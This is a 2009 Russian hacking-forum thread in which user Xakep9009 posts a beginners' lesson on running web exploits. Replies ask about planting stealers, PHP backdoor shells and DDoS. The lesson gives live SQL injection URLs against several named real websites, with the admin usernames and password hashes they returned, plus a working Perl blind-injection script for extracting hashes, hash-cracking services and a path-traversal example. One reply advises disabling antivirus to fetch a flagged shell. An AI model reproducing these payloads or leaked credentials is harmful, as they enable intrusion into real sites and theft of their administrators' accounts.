RE: Уроки от Xakep9009(для новичков!)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-04 19:01:33.516666
|
|
|
Vladngt
Сообщений: 283
Оценки: 0
Присоединился: 2008-12-31 17:32:42.463333
|
/
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-04 19:08:55.660000
|
|
|
славаславаслава
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-04 19:01:20.220000
|
Проблем с созданием и работоспособностью не возникло .. Один вопрос как всё это закинуть на определённый ip , или хотя бы в локалку ??
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-04 21:53:01.390000
|
|
|
free_kode
Сообщений: 505
Оценки: 0
Присоединился: 2008-10-24 15:19:05.420000
|
СИ тебе в помощь
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 02:16:00.613333
|
|
|
Фонарег
Сообщений: 104
Оценки: 0
Присоединился: 2008-11-01 13:54:08.890000
|
Блин я за! Руками и ногами так ка во многом не получается((((
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 02:48:51.650000
|
|
|
AndroS90
Сообщений: 101
Оценки: 0
Присоединился: 2009-01-05 02:04:19.490000
|
Xakep9009 Спасибо большое!!!Respect!!!!:)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 12:06:39.713333
|
|
|
славаславаслава
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-04 19:01:20.220000
|
free_kode
quote:
СИ тебе в помощь
Помоему мой вопрос был конкретней , чем твой ответ .
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 15:25:07.766666
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
Проблем с созданием и работоспособностью не возникло .. Один вопрос как всё это закинуть на определённый ip , или хотя бы в локалку ??
quote:
Помоему мой вопрос был конкретней , чем твой ответ .
По-моему твой вопрос до ужаса дибилен, ответ свободногоКода не имеет смысла т.к. тс не понимает о чём спросил
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 16:45:00.153333
|
|
|
AndroS90
Сообщений: 101
Оценки: 0
Присоединился: 2009-01-05 02:04:19.490000
|
Xakep9009 Спасибо!!!!!!!!!!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 16:58:14.103333
|
|
|
Redfox777
Сообщений: 62
Оценки: 0
Присоединился: 2008-12-26 19:37:32.616666
|
Спасибо Хакер 9009 ++ когда следуший урок
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 18:36:47.193333
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
quote:
ORIGINAL: brtn
quote:
Проблем с созданием и работоспособностью не возникло .. Один вопрос как всё это закинуть на определённый ip , или хотя бы в локалку ??
quote:
Помоему мой вопрос был конкретней , чем твой ответ .
По-моему твой вопрос до ужаса дибилен, ответ свободногоКода не имеет смысла т.к. тс не понимает о чём спросил
Почему не имеет? Очень даже имеет, это один из способов, хотя вопрос действительно странный
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 19:31:07.583333
|
|
|
Life4Music
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-05 19:26:48.580000
|
Xakeр 9009 спс за уроки))
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 20:25:15.360000
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
Так-с Хакер опять куда то пропал[:(]
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 21:53:55.263333
|
|
|
славаславаслава
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-04 19:01:20.220000
|
ну ето , трудно понять что ли ??
есть пинч (да хоть просто батник) , а доступа на ломаемый комп нет . отнести и поставить нельзя , firewall прилагается , антивирь тоже , шары нет , открытых портов тоже , администратор и гость отключены . что можете предложить ??
изините если что не так ..
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 22:48:21.603333
|
|
|
free_kode
Сообщений: 505
Оценки: 0
Присоединился: 2008-10-24 15:19:05.420000
|
он что робот что бы кажый день отписываться……………
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 23:12:17.320000
|
|
|
scum78
Сообщений: 9
Оценки: 0
Присоединился: 2008-11-19 16:06:42.406666
|
Хакер 9009, ну или кто-нибудь знающий (без претензии и "наезда"):
Объясните, плз, почему при попытке скачать архив с шеллом с 15 урока, антивирь выдает такую вещь: Backdoor.PHP.PhpShell.n!!!
Бэкдор насколько знаю оставляет дырку, через которую можно осуществить доступ к системе.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 23:33:53.046666
|
|
|
John.
Сообщений: 448
Оценки: 0
Присоединился: 2008-06-06 13:46:52.593333
|
антивирь всегда ругаецца на хак софт и подобное
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 23:40:01.426666
|
|
|
Viper[o_O]k
Сообщений: 163
Оценки: 0
Присоединился: 2008-08-16 09:31:45.666666
|
Хотелось бы увидеть урок по sql injection =)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-05 23:54:33.130000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: славаславаслава
ну ето , трудно понять что ли ??
есть пинч (да хоть просто батник) , а доступа на ломаемый комп нет . отнести и поставить нельзя , firewall прилагается , антивирь тоже , шары нет , открытых портов тоже , администратор и гость отключены . что можете предложить ??
изините если что не так ..
это что так сложно понять как вопросы задавать надо?
У тебя есть бэкдор, вперёд, заливай куда ты там хочешь. Не знаешь как - ищи инфу. Фаер включён говоришь - да неужели, какой? админ отключён, и что - какие права у пользователя, который будет взломан?
короче googl тебе в руки и терпение… и советую не слушать советы местных знатоков, в том числе и меня, ищи полную инфу, так ты будешь заточен куда шире…
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 00:13:26.176666
|
|
|
John.
Сообщений: 448
Оценки: 0
Присоединился: 2008-06-06 13:46:52.593333
|
brtn, я написал кое что в личку, глянь:D
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 02:22:55.190000
|
|
|
Xakep9009
Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39
|
Я видел был задан вопрос по моему прошлому уроку….про Shell….
______________________________________
Подумал над твоей проблемой(почему у тебя открывается только пустая страница)
1)В скрипте который я скинул что то повреждено….(хотя мало вероятно ведь я на себе проверял перед тем как скидывать)
2)У тебя некорректно работает твой Сервак (Настройки расставлены не верно)
3)Может ты не так путь набираешь…….
___________________________________________
Теперь решение проблемы
1)Попробуй на другом шелле посмотреть(работают ли они у тебя)
2)Если ты посмотрел и у тебя другие шеллы работают , а этот не работает….напиши мне в ПМ об этом…и я перезалью
3)Если у тебя ни тот ни те шеллы не работают….то зарегистрируйся на любом бесплатном хостинге поддерживающий PHP(И тестируй всё на этом сервере)
Надеюсь у тебя всё получится!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 02:34:50.506666
|
|
|
Life4Music
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-05 19:26:48.580000
|
а будут ли уроки про дефейс??
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 02:46:01.810000
|
|
|
Redfox777
Сообщений: 62
Оценки: 0
Присоединился: 2008-12-26 19:37:32.616666
|
напишы про sql
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 03:27:02.156666
|
|
|
BHYCHIK
Сообщений: 32
Оценки: 0
Присоединился: 2007-07-16 13:12:56.733333
|
Xakep9009, великолепные статьи! Давно искал что то подобное, но… похоже аналогов твоим статьям просто нет! С нетерпением жду продолжения! И очень надеюсь, что скоро появится IRC-канал и группа. Особенно хотелось бы видить IRC-канал.
Кстати, об IRC. Может посвятишь какой-нибудь урок взлому IRC'ов?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 09:32:32.163333
|
|
|
doggyyy
Сообщений: 10
Оценки: 0
Присоединился: 2009-01-06 03:22:56.250000
|
Поправте мну и помогите мну ……..
Вот я почитал все твои уроки я скажу что прочитал и сильно не заучивал (читал всю ночь и всё утро почти)
Зделав выводы из некоторых уроков у мну появились вопросы:
1)Смотри если я закину Shell на комп друга то я смогу его компом управлять?
2)Возможно ли хоть както в жизни обойтись без этих долбаных инженерных языков C++ Paslkal….Basic????(просто они мну раздражают)
3)Хакер пожалуйста обучи нас основам или приведи нас к основам DDOS атак))Пожалуйста тут не тока мне интересно как проводить атаки убийственные атаки от которых нереально защититься))
_______________________________________
Примечание от Xakep9009
1)Да…но тебе нужно , чтобы эта машина имела Сервер Apache c настроенным php…
2)Меня тоже раздражали по началу….потом ты будешь балдеть от своих неограниченных возможностей и власти :D (пс я кстати уже отвечал на этот вопрос….и насколько я помню…даже выделил отдельный урок….)
3)Будет в 16ом уроке ….будешь убивать всех на лево и на право )))(но не про ДДОС)
Не надо обижаться на такие посты….быстрее ответите ….меньше флуда , возмущения и негатива будет в этой теме.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 13:26:59.476666
|
|
|
Ilya180590
Сообщений: 1
Оценки: 0
Присоединился: 2009-01-06 11:40:38.450000
|
Вот на днях искал инфу и случайно нашел эту тему.Хакер9009, Ты просто молодчина!!!!!Тебе огромное спосибо!!!Ты меня вдохновил учиться и указал путь по которому следует идти.Я перечитал всю тему сначала и хоть в большенстве случаи я ничего не понял,но то как ты расказуешь и обьясняешь позавидует любой аббитуриент!!!Начну с начала и буду учиться(Не зря мне "шаряшие друзья" говорили - всему можно научиться самому - было б желание), - а после твоих уроков оно у меня появилось!Ещё раз тебе спосибо!Продолжай в том же духе!
P.s. Извените за offtop;)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 15:43:31.936666
|
|
|
KmServak
Сообщений: 37
Оценки: 0
Присоединился: 2009-01-02 19:40:31.806666
|
quote:
ORIGINAL: densymbian
Вот на днях искал инфу и случайно нашел эту тему.Хакер9009, Ты просто молодчина!!!!!Тебе огромное спосибо!!!Ты меня вдохновил учиться и указал путь по которому следует идти.Я перечитал всю тему сначала и хоть в большенстве случаи я ничего не понял,но то как ты расказуешь и обьясняешь позавидует любой аббитуриент!!!Начну с начала и буду учиться(Не зря мне "шаряшие друзья" говорили - всему можно научиться самому - было б желание), - а после твоих уроков оно у меня появилось!Ещё раз тебе спосибо!Продолжай в том же духе!
P.s. Извените за offtop;)
Не понимаю, зачем извиняться за offtop, сюда нужно писать наоборот.
Всё нормально не робей :)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 15:53:50.223333
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
2)Возможно ли хоть както в жизни обойтись без этих долбаных инженерных языков C++ Paslkal….Basic????(просто они мну раздражают)
да, тут дело в том какие цели ты преследуешь и какими средствами будешь пользоваться. Можно вообще без языков обойтись, пользоваться всем готовым, правда и зависеть ты будешь полностью от тех, кто пишет готовые решения
quote:
Хакер пожалуйста обучи нас основам или приведи нас к основам DDOS атак))Пожалуйста тут не тока мне интересно как проводить атаки убийственные атаки от которых нереально защититься))
инфы на этот счёт достаточно, от себя могу добавить - почитай про спуфинг ипа и про зацикливание пакетов, в некоторых случаях это поможет осуществить "убийственные" атаки
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 18:49:56.316666
|
|
|
Just Mafia
Сообщений: 1
Оценки: 0
Присоединился: 2009-01-06 18:45:29.556666
|
Xakep9009
Не могли бы Вы перезалить архив с шеллами. При попытке открытия выдаёт ошибку [:(]
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-06 20:01:32.130000
|
|
|
Тихий92
Сообщений: 48
Оценки: 0
Присоединился: 2008-09-14 21:09:01.476666
|
у тебя антивирус химичит. Отключи его. Просто на один из шеллов реагирует антивирус. У меня такая фигня с Nod32. Отключил, скачал, поставил на архив пароль, распаковал и заново включил антивирус. Вот и всё
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 01:08:12.970000
|
|
|
Life4Music
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-05 19:26:48.580000
|
Хаkep9009 спс большое.
Фейк – это сила))
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 02:52:30.456666
|
|
|
Xakep9009
Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39
|
Можно пропустить.
_______________________________________________________________
И так…фактически закончились все праздники…и пока у меня есть
время я еще раз постараюсь научить вас….
Слушай Вивальди…"Зима" =) так как по другому у меня просто нервы
не выдержат что то писать)))меня очень сильно родители ругают)))
что ты ничего не стоишь….итд)))Но хотя зачем вам это всё)))
….так сопильки по пускал….и в этот раз я буду писать про такую вещь как….
_______________________________________________________________
Урок 16.
Эксплойты
Exploit (Эксплойт) - от Английского слова Эксплуатировать, вообще эксплойт это найденная уязвимость которая очень хорошо описана её автором….то есть как правило автор эксплойта пишет скрипт…который нам нужно чуть чуть подредактировать….чтобы мы могли подставить его под свой случай….(Но это определение не подходит под все эксплойты)….видов эксплойтов очень много…и я постараюсь рассмотреть наиболее актуальные для нас. //У нас будет практика и вы 100% поймёте что такое Эксплойты.
Эксплойты используются для взломов сайтов…для получения удалённого доступа к компьютеру через (уязвимую программу\процесс выполняемый на компьютере\сервере атакуемого) или для полного уничтожения цели(компьютера\сайта).
И в этом Уроке я вас больше буду знакомить с Эксплойтами для сайтов.
Теперь я вам открываю секрет….почему быть взломщиком сайтов так не легко…
И почему Хакеры не всегда могут взломать сайты Фашистов…..Геев или Секты.
Всё дело в том…что Никто из перечисленных (ну наверное кроме геев:D не делают сами себе сайты….)
В том плане ….что они используют движки.
И тут мы знакомимся с понятием движки (CMS) - это система управления содержимым.
\\более подробно вы можете прочесть тут <-
То есть движки….это основа сайта….а всё содержимое уже заполняет её владелец.
А как вы понимаете по началу у движков…всё время находят баги….уязвимости…но как вы понимаете эти движки развиваются…и все свои недочёты закрывают…..образно говоря….кого легче прочитать …..роман Дарьи Данцовой…или Войну и мир?….как вы понимаете это не сопоставимые вещи….
Так и тут кого легче взломать? того кто написал свой движок….или использует чужой…испытанный годами….
(поверьте начинающего программиста легче ломануть, по себе знаю, по началу о безопасности никакой речи не идёт….первым делом идёт речь о функциональности…)
Сейчас я покажу вам примеры самых популярных движков…которые "испытаны годами" и очень часто используются.
1) Joomla -> http://www.seo-joomla.net
2) Datalife engine -> http://www.nullsoft.cc
3) WordPress -> http://maxsite.org/
4) Ucoz -> http://pokemon-ukraine.ucoz.ua/index/0-22
__________________________________
// Это были движки под сайты…..но не всегда движки предоставляют форумы…и вот популярные движки под форумы.
1) phpbb -> http://www.volchat.ru/forum
2) vBulletin -> http://forumishka.net
3) Invision Power Board (IPB) -> http://forum.exler.ru
//Естественно это отнють не все популярные движки…но нам для примера достаточно.=)
Ну вот мы и познакомились с понятием движки…как вы видите…сайты использующие одинаковые движки ничем не отличаются(по дизайну) кроме картинок…
Вот несколько способов как я определяю какой движок(и иногда версию движка) использует сайт.
1)Первым делом всегда смотрю на конец страницы.
"Создателям" сайта\форума иногда бывает даже лень стереть версию и название движка как допустим в примере с http://forumishka.net/ открываем и смотрим в самый конец страницы ….и видим vBulletin® Version 3.7.1 вот и видим…версию и номер движка…..
2)Потом смотрю на дизайн и так же на логотип(при адресной строке…там картинка маленькая это и есть логотип от форума\сайта)
\\когда немного наберёте опыта, а это будет очень скоро…вы сможете одним взглядом сказать на каком движке расположен тот или иной сайт.
3)После этого я смотрю на исходный код строницы….
Как в примере с http://www.nullsoft.cc ….в мета теге лежит вот что "DataLife Engine Nulled by M.I.D-Team"
\\Опять же опытные Хакеры могут по исходному коду определить не только название, но и версию! этого движка…что очень важно…(версия)
Теперь вы знаете почему не всё так просто…при взломе фашистских сайтов….если бы они делали движок сами…..то у них бы сайтов вообще не существовало…:D
Но где плюсы там и минусы….
Так как этот движок может использовать любой проходимец….хакеры этим пользуются и ставят себе этот движок "для тест драйва"(проверки на прочность). И если этот движок не прошёл эту проверку….отсюда появляется Эксплойт! о котором мы сейчас поговорим в плотную!
Самые популярные хакерские сайты где выкладывают самые свежие Эксплойты являются.
http://milw0rm.com
http://www.securitylab.ru
Так же есть поисковик эксплойтов.
http://madnet.name/tools/bugsearch/
Теперь мы знаем где взять эксплойты…
Давайте познакомимся какие виды эксплойтов бывают.
Программыне\процессные эксплойты (эти эксплойты могут осуществляться при определённых условиях, допустим на удалённой машине установлена та или иная программа) проще говоря эти эксплойты написаны для определённых программ\процессов.
//(сюда входят драйверы,установленные программы)
Так же отдельно можно выделить Эксплойты для Браузеров.
Эти эксплойты используются в таких целях
1)Чтобы браузер самостоятельно скачал открыл и запустил программу.
2)Для запудривание мозгов…в статье про фейк я приводил пример ….там где нужно было спрятать ссылку….(чтобы при наведении на ссылку в левом нижнем окне отображалась фейковская ссылка(неправильная))
3)Для отказа браузера в работе…..(чтобы он вылетал…или писал критические ошибки)
4)Так же чтобы ваш браузер перед тем как вы попали на нормальную (вашу ссылку) он переходил по еще 100 штукам))))
\\Пример: Вы заразили свой браузер…и теперь когда вы в адресной строке набираете google.com он переходит по sex.com , nosex.com , nogetro.com итд. и только потом на google.com.
Есть еще много разных видов эксплойтов …под браузеры…под разные цели…но я назвал основные.
Эксплойты под Операционные Системы.
Эти эксплойты в основном используются для получения удалённого доступа…поднятия прав до привелигерованного пользователя (Администратор\root) или отказа в обслуживании//Смерть системы…
И наконец эксплойты под WEB
Как я уже сказал….сюда входят уязвимости движков.
И в этой категории есть несколько видов(подкатегорий) эксплойтов.
1)XSS
2)XSRF
3)SQL inj
4)php include
Про два из них…вы уже должны хорошо знать….
А вот про 3ий и 4 пункт я вам пока не рассказывал…
__________________________________________________________________________
После долгой Теории без которой вы бы не обошлись….
Переходим к практике
Рассмотрим на примере эксплойта -> XSS \ SQL inj
http://milw0rm.com/exploits/7672 <-вот эксплойт
Восновном ХSS уязвимости рассматриваются в таком виде…
Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode] Что означает [Exploit(XSS)] - это всё что идёт до вот этого пути profile.php?user_id=29&auction_id=9
А эта часть [XssCode] это наш ядовитый код))))который мы используем….
В этом эксплойте автор нам любезно привёл пример….
http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<sсriрt>alert(1);</sсriрt>
Но это бывает редко….(эксплойты с примерами)
Как мы видим …в этом эксплойте описано несколько уязвмостей …..и приведён пример с SQL inj
Вот пример…..
http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers–
перейдя по ссылке вы найдете вот что….
10:admin:0cc1e6f7500e16099a4b17534136f1e1
Это Логин и Хеш от пароля….этого сайта….
admin - это логин , а через точку с запятой расположен хеш…. 0cc1e6f7500e16099a4b17534136f1e1
Этот хешь(масса) закодирован в md5 кодировку….про которую вы можете более подробно узнать тут
http://ru.wikipedia.org/wiki/MD5
Могу сказать…что md5 это моя головная боль))) хеш это предпоследняя стадия взлома…. =) до логина и пароля..админа….
то есть разкодировать хеш….то у нас будет админка сайта….
Сделать это в большинстве случаев можно при помощи online md5 декодеров….вот мои самые любимые
http://gdataonline.com/seekhash.php
https://hashcracking.info/index.php
http://passcracking.com/index.php
______________________________________
Но к сожалению они не всегда дают результат…..поэтому есть еще один вариант ….это скачать программу BarsWF с официального сайта http://3.14.by/ru/md5 и брутить пароль при помощи этой программы….(на сайте дана инструкция по применению)
//Отдельное спасибо моему другу про то, что он мне о этой проге рассказал.
Так-с поехали дальше….
В этом же эксплойте вы видите…
"Perl Exploit:"
и какой то непонятный скрипт….
Успокойтесь всё не так страшно как вам кажется….=)))
Знакомьтесь! это Перловый скрипт!
Он выполняет такую же функцию как приведённая мною выше SQL inj ….
Но только делает это при помощи скрипта(суть работы скрипта заключается в том….что он выдерает с Базы Данных по символу и мы получаем хеш….)
И так….чтобы запустить скрипт…нам нужно иметь Perl интерпретатор….
Если у вас он есть….это очень хорошо))) А если нету….то вам надо установить его вот отсюда
http://soft.softodrom.ru/scr/get.php?id=478 ActivePerl -> это интерпретатор под Windows
И так… Perl это отличный язык программирования….который не требует компиляци…!
И после того как вы установили ActivePerl ….вы можете пользоваться перловыми эксплойтами!(эксплойты написанные на перл)
Отличительная черна языка Perl от всех остальных….это простота….
Все перловые скрипты начинаются вот с этого….
#!/usr/bin/perl это как определитель…где находится сам интерпретатор….(но вы не пугайтесь….сейчас всё поймете…)
Значит нам нужно чтобы у нас заработал перловый скрипт…
1)Создаём любое_имя.txt файл.
2)Записываем туда скрипт…..(копируем)
____________________________________________________________
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
my $a;
my $host = "http://www.phpauctions.info/demo/profile.php?user_id=";
#Тут Может писаться любой сайт…потдерживающи этот скрипт….только учтите
#Что пишится он доконца…тоесть profile.php?user_id= досюда)))
my @chars = (48..57, 97..102);
for my $i(1..32) {
foreach my $ord(@chars) {
$a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord–");
if($a =~ /coucou/i) {#put the username of the user_id=[id]
syswrite(STDOUT,chr($ord));
$i++;
last;
}
}
}
____________________________________________________________
3)Редактируем код под себя
4)Переименовываем любое_имя.txt в любое_имя.pl //Расширение pl это означает что это перловый файл)
5)Запускаем скрипт…..и у нас в терминале будет появляться (по одной букавке) хеш…..
______________________________________________________
Убедительная просьба….не используйте скрипт до конца….(я имею ввиду….запустите его….посмотрите как он работает (до 3х букв максимум) ибо когда идёт перебор….посылаются "некорректные" запросы…и они остаются в логах у админа….представьте …если хотя-бы 100 человек попробует этот скрипт до конца….то админ….даже если он лаймер)))всёравно заметит…и закроет дыру.
______________________________________________________
В любом случае я вам просто показал как можно использовать эксплойты написанные на Perl.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Вы еще что то не поняли….тогда вот еще пример использования эксплойта…..
Рассмотрим следующий эксплойт написанный для joomla!
http://milw0rm.com/exploits/5729
Как вы видите этот эксплойт написан для Joomla которая поддерживает радио или видео.
Так же, если вы заметили , то тут как в первом случае примеров нету…Поэтому я нашёл сам…=)
Примеры использования эксплойта:
1) http://ural-fan.ru/index.php?option=com_joomradio&&page=show_radio&id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users–
//admin:5983e4c69b1465f771d4c91d265219a5
2)http://www.parustv.com/index2.php?option=com_joomradio&page=show_radio&id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users–
//4Rolny48:017849559a523a3f0923b91a5347d217
3)http://dwg-web.com/index2.php?option=com_joomradio&page=show_radio&id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users–
//jackalll:7f3ff651c487439dd340fdcbc7978191
Вот еще один эксплойт для Joomla
http://milw0rm.com/exploits/5300
И как вы можете заметить ….опять для определённого компонента…. "com_cinema"
Вот примеры…
1)http://www.jac64.com/index.php?option=com_cinema&Itemid=1&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
//admin:3d1c26bc6bf804e7ade03bed7438c1cc
2)http://www.horror.it/index.php?option=com_cinema&Itemid=75&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
//admin:c67f6752a25481cb01b4cd662be3aa3d
Надеюсь теперь вам стало понятнее….
К сожалению не получилось внятно найти эксплойта на php iclude….(я имею ввиду пример…) а вот эксплойт есть…..
http://milw0rm.com/exploits/7658
Так как вы у меня уже грамотные =) я уверен, что вы разберётесь …если увидите….что то подобное
Вот пример…
www.site.com/admin/admin_words.php?ModName=../../../../../etc/passwd
И вот хорошая статья про PHP include ….
http://www.netzoom.ru/view/533.html
И наконец я вам должен рассказать про то как можно php скрипты открывать через терминал)
Этот способ используют очень часто в мире эксплойтов….вот вам пример такого эксплойта…
http://milw0rm.com/exploits/7611
И так…что нам нужно….
1)Создаём — Сохраняем экплойт (который приведён выше).Пример example.php
2)Открываем командную строку
3)Переходим в каталог(директорию), где расположен файл php.exe Так как у вас установлен сервер…для каждого путь индивидуален….у меня этот путь будет C:\WebServers\usr\local\php5 там расположен мой файл php.exe
//Если вы точно не знаете где у вас он расположен прибегаем к поисковику…(Ваш стандартный поисковик файлов)
4)Далее перекидываем файл example.php
5)И прописываем в командной строке…
cd [путь к php.еxe] у меня это будет C:\WebServers\usr\local\php5…
Пример: cd C:\WebServers\usr\local\php5 (жмём энтр)
Следующая команда будет
php.exe example.php
Опять жмём энор и видим …что этот эксплойт предлагает нам опции….
-u - идонтифекатор пользователя….(у администраторов он обычно под номером 1 )
-s (targen for exploting) -Таргет..это цель….или в нашем случае это сайт… то-есть уязвимый сайт…который мы хотим сломать этим эксплойтом….
Задаём опции
php.exe example.php -s=http:\\site.com\chasti\ -u=1
После того как мы указали правильно параметры…начался брут хеша…..
__________________________________________________________
Итог
1)Мы узнали что такое Exploit и как его используют (для WEB)
2)Узнали почему Хакерам так не легко всё взламывать….и познакомились с понятием "Движок"
3)На практике рассмотрели разные виды эксплойтов под разные движки.
4)Узнали про еще один вид кодирования md5
5)Хоть и чуть чуть….но затронули тему php include (прочитайте ссылку которю я вам дал…)
6)Узнали какие виды эксплойтов бывают….и то что они пишутся под разными языками…(хочу еще добавить …большинство Эксплойтов пишется под Perl и PHP, так что подумайте какие языки выбирать для обучения;).)
7)Ну и наконец научились Запускать эксплойты из под терминала….(Perl & PHP)
_____________________________________________________________________________________________________
Пожалуй самое тяжёлое при написании этого урока ……это было подобрать примеры…..в основном….я ищу уязвимости сам….=)
//Я уверен ,что скоро для вас это тоже станет гораздо удобнее…чем искать експлойты(но знать про них вы обязаны)
Естественно перед этим я проверяю наличие эксплойта…но как правило под то …что я хочу "позаимствовать" эксплойта нету…
Так же …мне очень жаль …что я вас не познакомил с SQL inj перед тем как давать этот урок….=) но я надеюсь что когда мы создадим группу ….уже писать буду не только я ….но и Ученики…либо просто друзья которые захотят писать)))
Надеюсь вы нашли для себя что то новое =)
Удачи!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 02:58:01.376666
|
|
|
postal134
Сообщений: 1006
Оценки: 25
Присоединился: 2008-03-16 11:55:15.150000
|
quote:
меня очень сильно родители ругают))) что ты ничего не стоишь….итд))
Фигасе! не стоишь!
Такие уроки пишеш…:)
Плюсов больше чем постов!
Спасибо, узнал кое что новое.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 03:01:18.630000
|
|
|
Xakep9009
Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39
|
Ну просто я Музыкант…а вернее певец =)
Вот им и кажется …что я Голых тётинек разглядываю за компьютером день и ночь =)…вместо того чтобы Играть на фортепьяно или петь…что я тоже очень люблю)))
Отбор в Группу начался.
http://forum.xakep.ru/m_1364322/mpage_1/key_/tm.htm#1364333
Да кстати ! С Рождеством Вас!!!!!!!!!!!=))))
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 14:55:46.330000
|
|
|
SvargLin
Сообщений: 50
Оценки: 0
Присоединился: 2008-11-30 10:17:04.453333
|
Кстати на счет md5, в ubuntu помню искал прогу для расчета md5 образов(файлов) в списках пакетов видел пакет crack-md5. Поставил, почитал ман, попробывал, ни фига не получилось(( может кто знает как ей пользоваться.
ЗЫ: на счет группы не легче конфиренцию на jabber.ru устроить? Да и друг друга по взламывать будет интересно(в плане сайтов))), да и легче понять язык и возможные места уязвимостей.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 21:15:39.046666
|
|
|
BHYCHIK
Сообщений: 32
Оценки: 0
Присоединился: 2007-07-16 13:12:56.733333
|
Хакер, подскажи, что делать, если BackTrack 3 не видит вай-фай и эзернет адапторы. Если важно, ноутбук HP 6735s.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 21:56:55.013333
|
|
|
papst
Сообщений: 315
Оценки: 0
Присоединился: 2008-11-19 22:17:57.653333
|
Уменя не открываетца сайт http://phpnet.us он мне очен нужен, что случилось???
иле ето уменя чтото не так??
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 22:00:32.646666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
это у тебя что-то. у меня все нормально
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-01-07 22:03:43.853333
|
|
|
ziroookul
Сообщений: 8
Оценки: 0
Присоединился: 2008-12-22 23:04:41.003333
|
